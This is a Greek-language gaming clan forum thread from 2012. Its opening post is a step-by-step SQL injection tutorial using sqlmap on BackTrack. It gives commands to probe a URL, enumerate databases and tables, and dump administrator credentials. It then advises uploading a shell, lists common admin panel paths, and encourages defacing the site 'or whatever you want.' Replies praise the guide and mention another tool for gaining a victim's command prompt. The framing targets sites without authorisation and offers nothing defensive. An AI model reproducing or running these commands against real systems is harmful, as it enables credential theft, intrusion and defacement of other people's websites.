GAMEMASTERS CLAN

Καλώς Ορίσατε Στο Φόρουμ Μας
 
ΦόρουμForum PortalLatest imagesΕγγραφήΣύνδεση

 

 SQL Injection Χρησιμοποιώντας το BackTrack

Πήγαινε κάτω 
4 απαντήσεις
ΣυγγραφέαςΜήνυμα
[HMS]T3RM1N2T0R
HACKINGMASTER
HACKINGMASTER
[HMS]T3RM1N2T0R


Μηνύματα Μηνύματα : 104
Ημερομηνία Εγγραφής Ημερομηνία Εγγραφής : 22/12/2011
Ηλικία Ηλικία : 27
Χώρα Χώρα : everywhere and nowhere

SQL Injection Χρησιμοποιώντας το BackTrack Empty
ΔημοσίευσηΘέμα: SQL Injection Χρησιμοποιώντας το BackTrack   SQL Injection Χρησιμοποιώντας το BackTrack I_icon_minitimeΚυρ Απρ 22, 2012 12:17 am

Το SQL Injection είναι μια συχνή μέθοδος επίθεσης στις DataBase μιας ιστοσελίδας...
Για να το κάνουμε και εμείς αυτό θα χρειαστούμε μια έκδοση του BackTrack καλύτερα το 5 R1 και μια vulnerable σελίδα.
Πριν ξεκινήσουμε την επίθεση, θα πρέπει πρώτα να ελέγξουμε το site αν είναι vulnerable αυτό θα το κάνουμε με έναν πολύ απλό τρόπο. Προσθέτοντας ένα ' στο τέλος του URL της σελίδας
πχ http://www.example.com/index.php?id=123' αν αυτό μας δώσει ένα οποιοδήποτε σφάλμα σημάνει ότι είναι vulnerable Αν ΔΕΝ μας δώσει και η σελίδα φορτώσει κανονικά τότε το site ΔΕΝ είναι vulnerable
Αφού έχουμε ελέγξει και έχουμε δει ότι είναι vulnerable στο SQL Injection τότε προχωράμε στο επόμενο βήμα που είναι το BackTrack..
Στο terminal του BackTrack πληκτρολογούμε την εντολή: cd /pentest/database/sqlmap και πατάμε enter. Μετά python sqlmap.py -u την διεύθυνση της σελίδας ΧΩΡΙΣ ΤΟ ' --dbs
πχ python sqlmap.py -u http://www.example.com/index.php?id=123 --dbs και enter..
Αυτό θα πρέπει να μας δώσει τα ονόματα των DataBase.. Όταν ολοκληρωθεί η εντολή αυτή θα έχουμε ένα μεγάλο κείμενο που κάπου εκεί θα λέει τα ονόματα των DataBase πρέπει να τα βρείτε για να συνεχιστεί η επίθεση! Ας πούμε ότι βρήκαμε αυτές τις DataBase:
available databases [2]:
[*] database1
[*] database2
Τώρα θέλουμε να βρούμε τα tables για να βρούμε κωδικούς των διαχειριστών κλπ Αυτό θα το πετύχουμε με την εντολή:
python sqlmap.py -u http://www.example.com/index.php?id=123 --tables -D database1
Αυτό μπορεί να σας δώσει ΠΟΛΛΑ tables.. Εσείς θα Ασχοληθείτε με αυτό που σας ενδιαφέρει.. Ας πούμε ότι θέλουμε τον κωδικό του administrator.. Βρήκαμε ένα table με όνομα admin και υποθέτουμε ότι οι κωδικοί και το username του είναι εκεί οπότε θέλουμε να ανοίξουμε αυτό το table!
python sqlmap.py -u http://www.example.com/index.php?id=123 -D database1 -T admin --dump
ή εάν θέλουμε να ανοίξουμε όλα τα tables μίας DataBase:
python sqlmap.py -u http://www.example.com/index.php?id=123 --tables -D database1 --dump-all
Τώρα αν κάνατε τα πάντα σωστά θα έχετε πρόσβαση στην σελίδα ως διαχειριστής Very Happy υπάρχει περίπτωση να μην μπορείτε να κάνετε πολλές αλλαγές από εκεί.. Γιαυτό θα πρέπει να ανεβάσετε ένα shell στην DataBase..
Και επίσης να βρείτε και το Admin Panel!
Το πιο συνηθισμένο είναι:
/admin
/administrator
/admin/login
/admin_login
/login
Κ.α Very Happy Αυτό ήταν τώρα μπείτε και κάντε Deface ή ΟΤΙ άλλο θέλετε!! Very Happy Wink


Έχει επεξεργασθεί από τον/την [GMS]T3rmin2tor στις Κυρ Απρ 22, 2012 1:40 am, 1 φορά
Επιστροφή στην κορυφή Πήγαινε κάτω
{GMS}M2st3r
ADMINISTRATOR
ADMINISTRATOR
{GMS}M2st3r


Μηνύματα Μηνύματα : 338
Ημερομηνία Εγγραφής Ημερομηνία Εγγραφής : 22/12/2011
Ηλικία Ηλικία : 25
Χώρα Χώρα : Ελλάδα

SQL Injection Χρησιμοποιώντας το BackTrack Empty
ΔημοσίευσηΘέμα: Απ: SQL Injection Χρησιμοποιώντας το BackTrack   SQL Injection Χρησιμοποιώντας το BackTrack I_icon_minitimeΚυρ Απρ 22, 2012 1:16 am

Μπράβο! ρε t3rm καλά που έχουμε και εσένα και μας τα λες αναλυτικά 10x: good post:
Επιστροφή στην κορυφή Πήγαινε κάτω
https://thegmsclan.forumgreek.com
[GMS]Legend
ADMINISTRATOR
ADMINISTRATOR
[GMS]Legend


Μηνύματα Μηνύματα : 263
Ημερομηνία Εγγραφής Ημερομηνία Εγγραφής : 22/12/2011
Ηλικία Ηλικία : 84
Χώρα Χώρα : GREECE

SQL Injection Χρησιμοποιώντας το BackTrack Empty
ΔημοσίευσηΘέμα: Απ: SQL Injection Χρησιμοποιώντας το BackTrack   SQL Injection Χρησιμοποιώντας το BackTrack I_icon_minitimeΚυρ Απρ 22, 2012 3:29 am

WRAIA! Apo edw 8a pernw instructions gia sqlmap

10x: good post: +1
Επιστροφή στην κορυφή Πήγαινε κάτω
https://thegmsclan.forumgreek.com/
[HMS]Gludiator
Poster
Poster
[HMS]Gludiator


Μηνύματα Μηνύματα : 57
Ημερομηνία Εγγραφής Ημερομηνία Εγγραφής : 10/04/2012
Ηλικία Ηλικία : 35
Χώρα Χώρα : Ελλάδα

SQL Injection Χρησιμοποιώντας το BackTrack Empty
ΔημοσίευσηΘέμα: Απ: SQL Injection Χρησιμοποιώντας το BackTrack   SQL Injection Χρησιμοποιώντας το BackTrack I_icon_minitimeΔευ Απρ 23, 2012 4:16 am

Πολύ ωραίο post!!! Μια απ' τις πιο δυνατές επιθέσεις σε server... Ευκολη δουλειά για το BackTrack και πολυ χρήσιμη Smile Μπραβο Term... Smile
Επιστροφή στην κορυφή Πήγαινε κάτω
[HMS]T3RM1N2T0R
HACKINGMASTER
HACKINGMASTER
[HMS]T3RM1N2T0R


Μηνύματα Μηνύματα : 104
Ημερομηνία Εγγραφής Ημερομηνία Εγγραφής : 22/12/2011
Ηλικία Ηλικία : 27
Χώρα Χώρα : everywhere and nowhere

SQL Injection Χρησιμοποιώντας το BackTrack Empty
ΔημοσίευσηΘέμα: Απ: SQL Injection Χρησιμοποιώντας το BackTrack   SQL Injection Χρησιμοποιώντας το BackTrack I_icon_minitimeΔευ Απρ 23, 2012 4:31 am

Ναι όντος είναι καλό αλλά δεν πετυχαίνει Neutral Το SQL Ninja νομίζω οτι είναι πολύ καλο γιατί είχα δει στο youtube ένα tutorial που έδιχνε πως το χρησιμοποιούσε και στο τέλος είχε πρόσβαση στο cmd του θύματος του! Αλλα δεν ξέρω να το χρησιμοποιώ πρέπει να ρυθμίσεις ένα αρχείο και δεν ξέρω πως Neutral Ούτε τι ακριβώς κάνει δεν ξέρω Razz
Επιστροφή στην κορυφή Πήγαινε κάτω
{GMS}M2st3r
ADMINISTRATOR
ADMINISTRATOR
{GMS}M2st3r


Μηνύματα Μηνύματα : 338
Ημερομηνία Εγγραφής Ημερομηνία Εγγραφής : 22/12/2011
Ηλικία Ηλικία : 25
Χώρα Χώρα : Ελλάδα

SQL Injection Χρησιμοποιώντας το BackTrack Empty
ΔημοσίευσηΘέμα: Απ: SQL Injection Χρησιμοποιώντας το BackTrack   SQL Injection Χρησιμοποιώντας το BackTrack I_icon_minitimeΔευ Απρ 23, 2012 4:34 am

8a ta broume kai auta
Επιστροφή στην κορυφή Πήγαινε κάτω
https://thegmsclan.forumgreek.com
[HMS]T3RM1N2T0R
HACKINGMASTER
HACKINGMASTER
[HMS]T3RM1N2T0R


Μηνύματα Μηνύματα : 104
Ημερομηνία Εγγραφής Ημερομηνία Εγγραφής : 22/12/2011
Ηλικία Ηλικία : 27
Χώρα Χώρα : everywhere and nowhere

SQL Injection Χρησιμοποιώντας το BackTrack Empty
ΔημοσίευσηΘέμα: Απ: SQL Injection Χρησιμοποιώντας το BackTrack   SQL Injection Χρησιμοποιώντας το BackTrack I_icon_minitimeΔευ Απρ 23, 2012 9:30 am

To elpizw kapoia stigmh Razz
Επιστροφή στην κορυφή Πήγαινε κάτω
 
SQL Injection Χρησιμοποιώντας το BackTrack
Επιστροφή στην κορυφή 
Σελίδα 1 από 1
 Παρόμοια θέματα
-
» BACKTRACK 5
» Εγκατάσταση του Τοr στο BackTrack 5 R1
» προβλημα με backtrack 5 r2
» backtrack download help!
» DoS επίθεση με το BackTrack 5 R1 | Slowloris.pl

Δικαιώματα σας στην κατηγορία αυτήΔεν μπορείτε να απαντήσετε στα Θέματα αυτής της Δ.Συζήτησης
GAMEMASTERS CLAN :: Οδηγίες-
Μετάβαση σε: